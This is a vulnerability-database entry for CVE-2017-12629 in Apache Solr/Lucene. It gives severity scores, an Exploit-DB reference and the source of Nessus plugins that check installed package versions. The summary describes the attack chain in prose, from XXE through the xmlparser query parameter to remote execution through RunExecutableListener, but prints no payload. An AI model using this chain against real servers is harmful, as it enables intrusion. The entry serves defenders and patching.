Vulnerabilities > CVE-2017-12629 - XXE vulnerability in multiple products

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Tags: network, low complexity, apache, redhat, debian, canonical, CWE-611, critical, nessus, exploit available

Summary

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability lies in the XML Query Parser, which is available by default for any query request carrying the parameter defType=xmlparser; it can be exploited to upload malicious data to the /upload request handler, or as Blind XXE via the ftp wrapper, in order to read arbitrary local files from the Solr server. Note also that the second vulnerability is remote code execution through the RunExecutableListener, which is available on all affected versions of Solr.

Exploit-Db

description: Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution. CVE-2017-12629. Webapps exploit for XML platform
file: exploits/xml/webapps/43009.txt
id: EDB-ID:43009
last seen: 2017-10-17
modified: 2017-10-17
platform: xml
port:
published: 2017-10-17
reporter: Exploit-DB
source: https://www.exploit-db.com/download/43009/
title: Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
type: webapps

Nessus

  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2018-0004.NASL
    description: An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.9 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 105560
    published: 2018-01-04
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105560
    title: RHEL 7 : JBoss EAP (RHSA-2018:0004)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2018:0004. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(105560);
      script_version("3.14");
      script_cvs_date("Date: 2019/10/24 15:35:44");
    
      script_cve_id("CVE-2016-6346", "CVE-2017-12165", "CVE-2017-12167", "CVE-2017-12189", "CVE-2017-12629", "CVE-2017-7559", "CVE-2017-7561");
      script_xref(name:"RHSA", value:"2018:0004");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"RHEL 7 : JBoss EAP (RHSA-2018:0004)");
      script_summary(english:"Checks the rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An update is now available for Red Hat JBoss Enterprise Application
    Platform 7.0 for Red Hat Enterprise Linux 7.
    
    Red Hat Product Security has rated this update as having a security
    impact of Important. A Common Vulnerability Scoring System (CVSS) base
    score, which gives a detailed severity rating, is available for each
    vulnerability from the CVE link(s) in the References section.
    
    Red Hat JBoss Enterprise Application Platform is a platform for Java
    applications based on the JBoss Application Server.
    
    This release of Red Hat JBoss Enterprise Application Platform 7.0.9
    serves as a replacement for Red Hat JBoss Enterprise Application
    Platform 7.0.8, and includes bug fixes and enhancements, which are
    documented in the Release Notes document linked to in the References.
    
    Security Fix(es) :
    
    * It was found that Apache Lucene would accept an object from an
    unauthenticated user that could be manipulated through subsequent post
    requests. An attacker could use this flaw to assemble an object that
    could permit execution of arbitrary code if the server enabled Apache
    Solr's Config API. (CVE-2017-12629)
    
    * It was discovered that the jboss init script performed unsafe file
    handling which could result in local privilege escalation.
    (CVE-2017-12189)
    
    * It was found that GZIPInterceptor is enabled when not necessarily
    required in RESTEasy. An attacker could use this flaw to launch a
    Denial of Service attack. (CVE-2016-6346)
    
    * It was found that the fix for CVE-2017-2666 was incomplete and
    invalid characters are still allowed in the query string and path
    parameters. This could be exploited, in conjunction with a proxy that
    also permitted the invalid characters but with a different
    interpretation, to inject data into the HTTP response. By manipulating
    the HTTP response the attacker could poison a web-cache, perform an
    XSS attack, or obtain sensitive information from requests other than
    their own. (CVE-2017-7559)
    
    * It was discovered that the CORS Filter did not add an HTTP Vary
    header indicating that the response varies depending on Origin. This
    permitted client and server side cache poisoning in some
    circumstances. (CVE-2017-7561)
    
    * It was found that properties based files of the management and the
    application realm configuration that contain user to role mapping are
    world readable allowing access to users and roles information to all
    the users logged in to the system. (CVE-2017-12167)
    
    * It was discovered that Undertow processes http request headers with
    unusual whitespaces which can cause possible http request smuggling.
    (CVE-2017-12165)
    
    Red Hat would like to thank Mikhail Egorov (Odin) for reporting
    CVE-2016-6346. The CVE-2017-7559 and CVE-2017-12165 issues were
    discovered by Stuart Douglas (Red Hat); the CVE-2017-7561 issue was
    discovered by Jason Shepherd (Red Hat Product Security); and the
    CVE-2017-12167 issue was discovered by Brian Stansberry (Red Hat) and
    Jeremy Choi (Red Hat)."
      );
      # https://access.redhat.com/documentation/en/
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/documentation/en-us/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2018:0004"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6346"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-7559"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-7561"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-12165"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-12167"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-12189"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-12629"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-remoting");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-xnio-base");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-jgroups");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-async-http-servlet-3.0");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-undertow");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/01/03");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/04");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2018:0004";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
    
      if (! (rpm_exists(release:"RHEL7", rpm:"jbossas-welcome-content-eap"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP");
    
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-cli-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-commons-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-core-client-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-dto-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-hornetq-protocol-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-hqclient-protocol-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-jms-client-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-jms-server-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-journal-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-native-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-ra-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-selector-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-server-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-activemq-artemis-service-extensions-1.1.0-19.SP24_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-core-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-entitymanager-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-envers-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-infinispan-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-hibernate-java8-5.0.16-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-api-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-impl-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-common-spi-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-core-api-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-core-impl-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-deployers-common-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-jdbc-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-ironjacamar-validator-1.3.8-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-jboss-remoting-4.0.25-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-jboss-xnio-base-3.4.7-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-jgroups-3.6.12-1.Final_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-async-http-servlet-3.0-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-atom-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-cdi-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-client-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-crypto-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jackson-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jackson2-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jaxb-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jaxrs-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jettison-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jose-jwt-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-jsapi-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-json-p-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-multipart-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-spring-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-validator-provider-11-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-resteasy-yaml-provider-3.0.19-7.SP5_redhat_1.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-undertow-1.3.31-3.Final_redhat_3.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-7.0.9-4.GA_redhat_3.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-javadocs-7.0.9-2.GA_redhat_3.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-wildfly-modules-7.0.9-4.GA_redhat_3.1.ep7.el7")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "eap7-activemq-artemis / eap7-activemq-artemis-cli / etc");
      }
    }
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-C7BDF540B4.NASL
    description: Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-11-01
    plugin id: 104315
    published: 2017-11-01
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104315
    title: Fedora 26 : lucene (2017-c7bdf540b4)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Fedora Security Advisory FEDORA-2017-c7bdf540b4.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(104315);
      script_version("3.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2017-12629");
      script_xref(name:"FEDORA", value:"2017-c7bdf540b4");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"Fedora 26 : lucene (2017-c7bdf540b4)");
      script_summary(english:"Checks rpm output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Fedora host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Security fix for CVE-2017-12629
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Fedora update system website.
    Tenable has attempted to automatically clean and format it as much as
    possible without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-c7bdf540b4"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected lucene package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:lucene");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:26");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/10/31");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/01");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Fedora Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
    os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
    os_ver = os_ver[1];
    if (! preg(pattern:"^26([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 26", "Fedora " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"FC26", reference:"lucene-6.1.0-6.fc26")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "lucene");
    }
    
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2017-3123.NASL
    description: A security update is now available for Red Hat JBoss Enterprise Application Platform 7 for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. [Updated 6th November 2017] Previously, this erratum was marked as having a security impact of Critical. This was incorrect; Red Hat JBoss Enterprise Application Platform 7 was affected with a security impact of Moderate. This advisory has been updated to that effect. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This asynchronous patch is a security update for lucene package in Red Hat JBoss Enterprise Application Platform 7.0.8. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 104457
    published: 2017-11-08
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104457
    title: RHEL 6 / 7 : JBoss EAP (RHSA-2017:3123)
    code:
    #
